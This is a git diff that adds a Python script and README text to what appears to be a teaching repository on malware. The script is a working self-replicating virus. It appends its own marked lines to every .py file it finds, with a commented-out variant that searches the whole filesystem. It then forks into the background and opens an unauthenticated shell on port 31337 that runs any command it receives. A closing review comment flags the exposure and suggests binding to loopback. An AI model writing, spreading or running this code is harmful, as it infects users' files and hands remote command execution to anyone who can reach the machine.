diff --git a/README.md b/README.md index d188f3e..532d3e1 100644 --- a/README.md +++ b/README.md @@ -11,10 +11,23 @@ $ python rshell.py ``` It will open a reverse shell on port 31337 on the local system. You can connect -to it using `nc 0.0.0.0 31337`. +to it using + +```bash +$ nc 0.0.0.0 31337 +``` ## self_copy_test.py Code snippet that searches files based on a search string and copies its content into all matched files. There is a local `victims` folder for testing purposes. + +## Putting things together + +```bash +$ python self_copy_rshell.py +``` + +Runs code that seraches for victim files and deploys a appends the reverse +shell snippet. The example only searches the local `victims` folder. diff --git a/self_copy_rshell.py b/self_copy_rshell.py new file mode 100644 index 0000000..bb29242 --- /dev/null +++ b/self_copy_rshell.py 
@@ -0,0 +1,66 @@
+import os #!x
+import sys #!x
+import glob #!x
+import socket #!x
+import string #!x
+
+# search command, adjust to your needs
+#cmd = 'find / -name "*.py" -print' #!x
+cmd = 'find ./victims -name "*.py" -print' #!x
+# keyword which prevents file from getting infected
+keyword = 'plsdontinjectme' #!x
+
+# for each file that matches the search command
+for snippet in os.popen(cmd).readlines(): #!x
+    # strip newlines
+    snippet = snippet[:-1] #!x
+    try: #!x
+        # open this file containing the target code
+        code = open(__file__, 'r') #!x
+        # open victim file
+        victim = open(snippet, 'r') #!x
+        # read the content of the victim file
+        read_victim = victim.read() #!x
+        # if the file contains keyword, do not inject code
+        if str.find(read_victim, keyword) == -1: #!x
+            # open it with write_append rights
+            victim = open(snippet, 'a') #!x
+            # for each line in
+            for line in code.readlines(): #!x
+                # if the line contains the copy signal
+                if("#!x") in line: #!x
+                    # close the code file
+                    code.close() #!x
+                    # cast the line containing code
+                    insert=(line) #!x
+                    # insert the code into the victim file
+                    victim.write(insert) #!x
+    # poor mans error handling
+    except IOError: #!x
+        a = 1 #!x
+
+# fork to bg
+pid = os.fork() #!x
+# make sure we are in the child process
+if pid > 0: #!x
+    sys.exit(0)
+try: #!x
+    # create the socket and listen
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #!x
+    s.bind(("0.0.0.0",31337)) #!x
+    s.listen(1) #!x
+# poor mans socket error handling
+except socket.error as e: #!x
+    print(e) #!x
+    sys.exit(0) #!x
+# forever try to accept new connections
+while 1: #!x
+    (cli,add) = s.accept() #!x
+    info = {"platform":sys.platform, "version":sys.version} #!x
+    welcome = "You are connected to shell on {0[platform]}, Python Version: {0[version]}\r\n".format(info) #!x
+    cli.send(welcome.encode('utf-8')) #!x
+    # forever receive cli commends, execute and report back
+    while 1: #!x
+        data = cli.recv(1024).rstrip() #!x
+        resp = 
os.popen(data.decode('utf-8')).read() #!x + cli.send(resp.encode('utf-8')) #!x
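Review bot: The listener set up by `s.bind(("0.0.0.0",31337))` accepts from every interface and hands each received line straight to `os.popen` with no authentication, so any host that can reach port 31337 gets command execution on the machine running the test. Since the README's own example connects with `nc` from the local machine, binding the loopback address keeps the lab reachable only locally: `s.bind(("127.0.0.1",31337)) #!x`. The `cmd` string is the only thing confining the append loop to `./victims` (the commented-out `find / -name "*.py"` variant would walk the whole filesystem), so the header comment should state that the script modifies matched files in place and that the `#!x` marker and the `plsdontinjectme` keyword are what to grep for when checking which files were touched and when cleaning up the `victims` folder.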